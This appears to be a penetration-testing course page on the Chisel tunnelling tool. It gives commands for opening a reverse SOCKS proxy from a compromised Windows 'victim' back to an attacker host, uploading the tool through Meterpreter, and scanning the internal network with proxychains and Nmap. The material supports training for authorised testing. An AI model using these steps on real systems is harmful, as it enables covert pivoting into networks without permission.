Dashboard
Courses
Logout

NAME

Course Overview

/

Chisel

What is Chisel?

Chisel is a TCP/UDP tunnelling tool created using the programming language Go (golang). The network traffic is transported via HTTP but the connection is secured via SSH. Chisel was primarily built to pass network traffic through firewalls, however, it is also used to provide access to endpoints within a network; making it ideal for pivoting.

How to use Chisel?

The tool operates on a client/server model, meaning the roles need to be defined on each endpoint for successful data transfer and communication. This can be achieved by uploading and running the different pre-made binaries along with the appropriate flags for the command.

There are a few options when using chisel whereby you can configure to push ports to and from an endpoint like traditional SSH Port forwarding. However, the most efficient method we have established is to create a reverse SOCKS proxy to enable the ability to use all ports on the target network.

Link for the pre-made binaries: https://github.com/jpillora/chisel/releases

Reverse Proxy Instructions

1. On the attackers machine: ./chisel_1.7.6_linux_amd64 server -p 9854 --reverse

2. On the victim machine (windows): .\chisel_1.7.6_windows_amd64.exe client <attacker IP>:<Listening port> R:socks

Uploading Chisel via Meterpreter

When using Meterpreter to upload and run Chisel you may encounter an issue when attempting to run the binary on the victim machine, to overcome any issue when interacting with Meterpreter it is advised to drop into a CMD shell and using the CMD command "start". See below for walkthrough:

1. Uploaded chisel through the meterpreter session using the "upload <file path>" command

2. Drop into CMD shell using the command "shell"

3. Run the following command within CMD "start chisel_1.7.6_windows_amd64.exe client <attacker IP>:<listening port> R:socks"

Using Chisel with Proxychains/SOCKS Proxy

To use other locally installed tools with Chisel when using the reverse proxy you must configure proxychains4.conf in the following location on Linux hosts:

· /etc/proxychains4.conf

Please note the SOCKS proxy entry should be made at the bottom of the config file.

Once configured to match the details from the Chisel command, you can use other tools to follow the proxy via the proxychains command line, for example, when using Nmap you would use the following command:

· "proxychains nmap -sT -sV <target>"